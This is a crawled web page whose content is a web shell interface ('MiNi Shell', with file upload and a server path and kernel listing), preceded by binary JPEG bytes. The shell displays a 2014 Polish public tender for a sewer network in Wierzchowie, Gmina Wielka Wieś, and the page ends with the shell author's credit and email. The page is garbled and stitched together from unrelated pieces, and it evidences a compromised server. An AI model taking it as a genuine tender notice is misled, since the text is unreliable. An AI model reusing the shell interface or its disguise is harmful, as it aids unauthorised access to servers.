JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140714/234536-N-2014.html

<p class="kh_header"><b>Wielka Wieś: Budowa sieci kanalizacji sanitarnej wraz z obiektami towarzyszącymi, w miejscowości Wierzchowie, Gmina Wielka Wieś - Etap I</b><br>
<b>Numer ogłoszenia: 234536 - 2014; data zamieszczenia: 14.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wielka Wieś , ul. Wesoła 48, 32-089 Wielka Wieś, woj. małopolskie, tel. 012 4191704, faks 012 4191705.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wielka-wies.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci kanalizacji sanitarnej wraz z obiektami towarzyszącymi, w miejscowości Wierzchowie, Gmina Wielka Wieś - Etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1.Przedmiotem zamówienia jest: Budowa sieci kanalizacji sanitarnej wraz z obiektami towarzyszącymi, w miejscowości Wierzchowie, Gmina Wielka Wieś - Etap I

1.1.1.	Zakres rzeczowy obejmuje budowę na odcinku: 
 Obowiązujące mapy syt.- wys. z projektu wykonawczego  dla m. Wierzchowie:  sekcje 163.311.121;  163.311.114; 163.311.123 oraz z m. Bębło 163.311.112

Zakres budowy:
-Sekcja 163.311.121  
ul. Spacerowa  -  odcinek między S138 - S139 ( L= 10 m ) ; od  S139 - S112   wraz z sięgaczami
-Sekcja 163.311.123;  163.311.114  
ul. Spacerowa od S112 do tłoczni ścieków wraz z sięgaczami;           
ul. Olchowa  S151 - S150;  S150 - S 101 wraz z sięgaczami; 
ul. Słoneczna, ul. Rogatka od tłoczni ścieków do wykonanych rurociągów tłocznych zlokalizowanych na granicy działek 208/2 i 208/1 wraz z sięgaczami
-Sekcja 163.311.112   
przesył  od  S27  do S1, S 151 
Nie wykonywać, sięgaczy:
1. fi63 PE , fi50 PE  przechodzący przez  dz. nr 7/9 ; 7/4 ; 7/5;  oraz fi200 PVC równolegle do gazociągu na dz. 5
2.  fi50 PE z  PP. nr  23 na dz. 47/1
3.  fi50 PE z PP. nr 29 dz. 255/8
Nie wyceniać odcinka  kanalizacyjnego w ul. Olchowej ( S148 - S150) - został już wykonany. 


1.1.2.	 Kanalizacja grawitacyjna PVC DN klasy S  (SDR 34,SN8) :

rurociągi o połączeniach kielichowych z uszczelką gumową 
fi160 /4,7 mm ; fi200 / 5,9 mm ; fi315 / 9,2 mm 
                                                                                   
1.1.3.	 Rurociągi tłoczne:

rurociągi z polietylenu PE - HD 
klasa PE 100 ( SDR11, PN16)   fi90 x 5,4 mm   
klasa PE 100 (SDR11, PN12,5) fi160 x14,6 mm 
klasa PE 80 (SDR17, PN8)        fi 50 x 3,0 mm   
klasa PE 80 (SDR17, PN8)        fi 63 x 3,8 mm   
rura poliestrowa typu Hobas, PN1, SN 10000 fi300   
                                                   

1.1.4.	 Rura kamionkowa  przeciskowa glazurowana wykonana w technologii przecisku sterowanego           fi 300 mm, fi 250 mm, fi 200 mm 


1.1.5.	 Pompownia przydomowa

Dostawa i montaż kompletnych przydomowych przepompowni ścieków, z zatopioną jedną pompą wirową w zbiorniku PEHD DN minimum 800 mm ( wyposażone w sprzęgło nadwodne) wraz z pełnym zasilaniem energetycznym i  sterowaniem pracą pomp -  kpl. 5  ( pp. nr 22, 24,25,26,28)

1.1.6.	 Dostawa i montaż kompletnej tłoczni ścieków
	zaprojektowano tłocznię z polimerobetonu o średnicy Dn=2600 mm lub PEHD o średnicy min. 2000mm  wyposażoną w monitoring wraz z zasilaniem elektrycznym kpl. 1   
	
1.1.7.	 Dostawa i montaż  -Komory zasuw  -  prefabrykowana  fi 2000 z wyposażeniem - kpl. 1 

1.1.8.	 Studnie kanalizacyjne systemowe

prefabrykowane  fi 1200 mm; PE fi 425 ; fi 315 mm  

1.1.9.	 Armatura

- do płukania kanałów - fi 80 mm 
                                             fi 50 mm  
- zespół napowietrzająco - odpowietrzający do bezpośredniej zabudowy w ziemi fi 80 mm  

1.1.10.	  Przekroczenie cieków wodnych
Przekroczenie nr VI oraz nr VII - przewierty pod potokiem Kluczwoda z umocnieniem skarp koryta potoku po obu stronach brzegu płotkami z kiszki faszynowej. 

1.1.11.	 Zagospodarowanie terenu wokół tłoczni ścieków 
Elementy ogrodzeniowe zgrzewane (panelowe) w kolorze zielonym + podmurówka z ceownika betonowego 0,2x0,2 m na słupkach stalowych obsadzonych w cokole - wysokość 1,53m; rozstaw 2,40 m z rur fi 76/3,5 mm. Panele  jednostronnie zakończone ostrymi końcówkami drutów o długości 30mm, umieszczone na górze ogrodzenia. Wymiar oczka: 100 x 50 mm. Średnica drutu: 4,5 mm. Druty stalowe zgrzewane, ocynkowane, malowane proszkowo. Słupki ze stali ocynkowanej wewnątrz i na zewnątrz, malowane metodą proszkową, wyposażone w plastikowe kapturki. Typowe wrota w ramach stalowych na gotowych słupkach, szerokość wrót 3,00 m  (brama dwuskrzydłowa o szerokości 2x 1,50 m co daje 3,00 m i wysokości 1,73m, z ryglem wraz z  poprzecznym ryglem zwieńczony kłódką nierdzewną).
Montaż ogrodzenia systemowego -  łącznie L= 30,5m.
Teren wokół ogrodzenia należy obsadzić sadzonkami tui szmaragdowych
Teren pompowni wyłożyć kostką brukową betonową, kolor szary  o powierzchni 60,0 m2 .                                                                                                                                                                                            
Tłocznie ścieków wyposażyć w żurawik słupowy obrotowy z wciągarką łańcuchową do demontażu pomp - udźwig min. 500kg (dostawa i montaż).
 Teren pompowni należy oświetlić lampą z wyłącznikiem zmierzchowym.
                                                                                            
1.1.12.  Nawierzchnie drogowe:

 rozbiórka i naprawa podbudowy i nawierzchni asfaltowej KR2 w ul. Spacerowa  o powierzchni            2 504m2 
 rozbiórka i naprawa podbudowy i nawierzchni tłuczniowej  w ul. Olchowej o powierzchni            2 297,7  m2
 rozbiórka i naprawa podbudowy i nawierzchni asfaltowej w ul. Słoneczna i Rogatka o powierzchni                   1 298 m2

Uwaga: Istniejąca nawierzchnia asfaltowa przeznaczona jest do frezowania na całej szerokości. Materiał - recykling będzie w dyspozycji Inwestora ze wskazaniem miejsca do odwozu.
Roboty renowacyjne dróg należy wykonywać na bieżąco bezpośrednio po zakończeniu robót kanalizacyjnych na całej długości w danej ulicy.
 

2. Pompownie ścieków należy wyposażyć oraz uruchomić w ramach systemu monitorowania i zdalnego sterowania i włączyć do istniejącego systemu na terenie gminy. Istniejący system monitorowania wykonany jest przez firmę Control-System z Poznania. Wyposażenie szafy sterowniczej:
	Szafa sterownicza musi być wyposażona (w zależności od wymagań w miejscu instalacji) w moduł telemetryczny MT-101 lub MT-102 lub MT-151 lub MT-201 firmy InVentia wraz z kartą SIM w wersji przedpłaconej z wykupionym pakietem danych 500 MB ważnym przez 3 lata zarejestrowaną na ZGK Wielka Wieś, umożliwiającą przesył danych pomiędzy stacją dyspozytorską a modułem obiektowym 
	Szafkę sterowniczą należy wyposażyć w profesjonały moduł (przekładnik) do pomiaru prądu pracy pomp z sygnałem wyjściowym 4-20mA 
	W przypadku zastosowania silników pomp o mocy większej niż 5 kW szafka musi być wyposażona w profesjonalny układ miękkiego rozruchu (soft-start) wyposażony port komunikacyjny obsługujący protokół ModBus 
	Na elewacji drzwi wewnętrznych szafki sterowniczej należy zainstalować dotykowy panel graficzny z ekranem o przekątnej nie mniejszej niż 3,4 cala 
	Funkcjonalność szafki musi obejmować zdalne wyłączenie tłoczni i zdalną dezaktywację pływaków.
 3. Do celów projektowych i kosztorysowych dobrano pompownie oraz tłocznie w oparciu o obliczenia firmy Wilo Polska, kompletowane również przez w/w firmę. Dopuszcza się pompownie i tłocznie  o parametrach co najmniej równoważnych.
   
4. W przypadku zastosowania tłoczni bądź pompowni strefowych innego producenta dopuszcza się ich kompletację wyłącznie przez producenta pompowni lub tłoczni.

5. Pompownie przydomowe stanowić mają kompletny, oryginalny produkt renomowanego producenta, gwarantującego najwyższą jakość wykonawstwa, serwisu, oraz udzielonych gwarancji. 

6. Do odbioru końcowego Wykonawca ma obowiązek dostarczyć komplet oświadczeń właścicieli  działek objętych  w pozwoleniu na budowę o uporządkowaniu terenu po wykonanych pracach. 

7.Warunkiem powołania komisji odbiorowej jest przedłożenie inwentaryzacji geodezyjnej powykonawczej.

8.Przed odbiorem częściowym i odbiorem końcowym prac kanalizacyjnych, będzie dokonany odbiór systemem kamerowym, przy pomocy specjalistycznych kamer dla kanalizacji wykonanej systemem grawitacyjnym. Monitoring kanalizacji Gmina-jako Inwestor wykona na własny koszt. Odbiór ten wykonywany zostanie, przy udziale Inspektora nadzoru budowlanego i Kierownika budowy oraz w obecności upoważnionych osób ze strony Wykonawcy i Inwestora.
Obejmować będzie sprawdzenie danego odcinka instalacji pod względem zgodności stanu wybudowanego z dokumentacją, warunkami technicznymi, zachowania szczelności połączeń rur kanalizacyjnych i odpowiednich spadków. Każdy odbiór będzie  podsumowany raportem w wersji pisemnej i graficznej.

9.W przypadku stwierdzenia podczas monitoringowego odbioru robót kanalizacyjnych - niewłaściwego wykonania przedmiotu umowy, Wykonawca niezależnie od usunięcia wad na odcinku sieci kanalizacyjnej - poniesie koszty takiej kontroli monitoringowej przy użyciu kamer zarówno przy stwierdzeniu niewłaściwości, jak i powtórnej kontroli po usunięciu niewłaściwości.

10. Szczegółowy zakres robót określa dokumentacja projektowa, specyfikacja techniczna oraz
przedmiary  robót wszystkich branż, które należy traktować jako materiały pomocniczy do
określenia przedmiotu zamówienia. Przedmiary te nie mogą  stanowić  podstawy do wyceny,
bowiem każdy z oferentów jest zobowiązany do zapoznania się z projektami oraz innymi uwarunkowaniami i na podstawie tak uzyskanej wiedzy opracować kosztorys ofertowy. 
Kosztorys ofertowy będzie spełniał funkcje pomocniczą i  informacyjną dla Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.22.20.00-9, 45.23.13.00-8, 45.23.32.20-7, 45.23.24.40-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wadium w kwocie 50 tys.zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy w tym okresie co najmniej 2  roboty budowlane odpowiadającą swoim rodzajem i wartością robocie stanowiącej  przedmiot zamówienia. Za roboty tego samego rodzaju Zamawiający uzna budowę lub przebudowę kanalizacji sanitarnej o wartości minimum 1.000.000,00 zł brutto  (jeden milion zł) każda.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże dysponowanie minimum: 1 kierownikiem budowy posiadającym uprawnienia w zakresie sieci sanitarnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca
wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 200.000,00 zł- (słownie: dwieście tysięcy złotych)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>w wykazie robót budowlanych nalezy wskazać co najmniej 2  roboty budowlane odpowiadającą swoim rodzajem i wartością robocie stanowiącej  przedmiot zamówienia. Za roboty tego samego rodzaju Zamawiający uzna budowę lub przebudowę kanalizacji sanitarnej o wartości minimum 1.000.000,00 zł brutto  (jeden milion zł) każda.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz OFERTA- załącznik nr 1 do SIWZ.
Pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów dołączonych do oferty.
Oświadczenia i dokumenty wymagane postanowieniami rozdziału VIII SIWZ.
Kosztorys ofertowy spełniający funkcje pomocniczą i  informacyjną dla Zamawiającego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany terminu, o którym mowa w projekcie umowy  w przypadku wystąpienia okoliczności nie wynikłych z winy Wykonawcy, w tym między innymi: 
a)wystąpienia warunków atmosferycznych uniemożliwiających realizację robót 
b) wystąpienia zmian parametrów projektowych opisanych w SIWZ dla wykonywanego obiektu.
c)wystąpienia konieczności wykonania robót nieprzewidzianych.
d) przedłużania się prac związanych z prowadzeniem badań archeologicznych 
e) wystąpienia niezależnych od Zamawiającego i Wykonawcy trudności w uzyskaniu pozwoleń,
decyzji, uzgodnień niezbędnych do realizacji umowy.  
 Termin wykonania zamówienia zostanie przesunięty odpowiednio o czas:
a) wstrzymania robót ze względu na warunki atmosferyczne
b) niezbędny do wprowadzenia zmian do projektu
c) niezbędny do wykonania robót nie przewidzianych.
d)wstrzymania robót ze względu na przedłużające badania archeologiczne
e) uzyskania niezbędnych do realizacji umowy pozwoleń, decyzji, uzgodnień.
 Zmiana terminu powinna być potwierdzona protokołem konieczności zaakceptowanym przez
Zamawiającego i podpisana przez Zamawiającego i Wykonawcę.
Zmiana wynagrodzeniamoze nastapic w przypadku: 
a)  ustawowej  zmiany stawki podatku VAT
b)  wprowadzonych przez Zamawiającego w trakcie realizacji przedmiotu umowy zmian dotyczących technologii wykonania
określonych w niniejszej umowie.
c) w przypadku nie wykorzystania w całości kwoty umowy o której mowa w art.12  niniejszej umowy w związku z nie wykonaniem robót uznanych jako nie konieczne choć objętych ofertą Wykonawcy oraz SIWZ, przy czym ewentualne obniżenie nastąpi w oparciu o wartości wynikające z oferty Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wielka-wies.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wielka Wieś, ul. Wesoła 48, 32-089 Wielka Wieś.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.07.2014 godzina 09:30, miejsce: Urząd Gminy Wielka Wieś, ul. Wesoła 48, 32-089 Wielka Wieś,Biuro Obsługi Interesantów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com